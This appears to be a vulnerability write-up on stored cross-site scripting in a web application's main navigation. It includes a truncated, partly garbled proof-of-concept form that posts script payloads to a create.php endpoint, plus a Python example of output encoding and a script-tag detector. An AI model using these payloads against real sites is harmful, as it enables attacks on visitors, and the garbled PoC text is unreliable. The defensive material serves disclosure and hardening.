The injection point is inside the “sitemap.html” file, where a user can use conditional statements to execute arbitrary script. To exploit this XSS vulnerability, the user needs to be logged in as an admin. The following PoC, available on GitHub, injects arbitrary script into the main navigation of the application (the markup is reproduced as extracted; the value payloads and the final input are truncated):

<form action="http://BLUE_SAPIENSUALS/mainnav/create.php" method="POST">
  <input type="hidden" name="val" value="?=xss(document.domain);?>"/>
  <input type="hidden" name="val2" value="?=xss(document.domain);?>"/>
  <input type="hidden" name="val3" value="?=xss(document.domain);?>"/>
  <input type="hidden" name="val4" value="?=xss(document.domain);?>"/>
  <input type="hidden" name="val5" value="?=xss(document.domain);?>"/>
  <input type="hidden" name="val6" value="?=xss(document.domain);?>"/>
  <input type="hidden" name="val7" value="?=xss(document.domain);?>"/>
  <input type="hidden" name="val8" value="?=xss(document.domain);?>"/>
  <input type="hidden

XSS (Stored)

A second copy of the same PoC form appears in the extracted text:

  <input type="hidden" name="val" value="xss(document.domain);?>"/>
  <input type="hidden" name="val2" value="?=xss(document.domain);?>"/>
  <input type="hidden" name="val3" value="?=xss(document.domain);?>"/>
  <input type="hidden" name="val4" value="?=xss(document.domain);?>"/>
  <input type="hidden" name="val5" value="?=xss(document.domain);?>"/>
  <input type="hidden" name="val6" value="?=xss(document.domain);?>"/>
  <input type='hidden' name='val7' value=' xss (document.domain );?'> />

Finding The Injection Point

We can use the PoC to find the injection point by running the following command, which serves the PoC page from the current directory:

python -m SimpleHTTPServer 80

Injects script into the main navigation of the application
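The bug class above is stored values from the create.php POST (val through val8) being written into the navigation markup without output encoding. The following is an added example, not code from the PoC or the affected application: it contrasts a verbatim renderer with one that HTML-encodes at output time, adds an input-side label check, and includes a crude detector for script content in rendered nav output. The field names come from the PoC; the sample payload and the list-item markup are constructed assumptions.

```python
import html
import re

# Field names the PoC posts to mainnav/create.php (taken from the page).
NAV_FIELDS = ["val"] + [f"val{i}" for i in range(2, 9)]

# Constructed sample POST body: a script-tag payload stands in for the
# page's garbled value; one field holds a benign label for contrast.
SAMPLE_POST = {f: "<script>alert(document.domain)</script>" for f in NAV_FIELDS}
SAMPLE_POST["val"] = "Home"

# Allowlist for navigation labels: printable text, no angle brackets or quotes.
LABEL_RE = re.compile(r"^[\w .,&/()-]{1,64}$")


def validate_nav_label(label: str) -> bool:
    """Input-side check for create.php: reject labels that are not plain text."""
    return bool(LABEL_RE.match(label))


def render_vulnerable(post: dict) -> str:
    """Mirrors the bug class: stored values emitted into the nav markup verbatim."""
    return "".join(f'<li class="mainnav">{post.get(f, "")}</li>' for f in NAV_FIELDS)


def render_hardened(post: dict) -> str:
    """HTML-encode every stored value at output time, whoever stored it."""
    items = []
    for f in NAV_FIELDS:
        label = html.escape(post.get(f, ""), quote=True)
        items.append(f'<li class="mainnav">{label}</li>')
    return "".join(items)


def contains_active_content(markup: str) -> bool:
    """Detector for the PoC's effect: a raw script tag or inline event handler."""
    return re.search(r"<script\b|\son\w+\s*=", markup, re.I) is not None


if __name__ == "__main__":
    print("vulnerable:", contains_active_content(render_vulnerable(SAMPLE_POST)))
    print("hardened:  ", contains_active_content(render_hardened(SAMPLE_POST)))
```

Admin-only reachability does not remove the need for encoding: the stored value is served to every visitor who loads the navigation.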

Timeline

Published on: 11/15/2022 15:15:00 UTC
Last modified on: 11/16/2022 19:42:00 UTC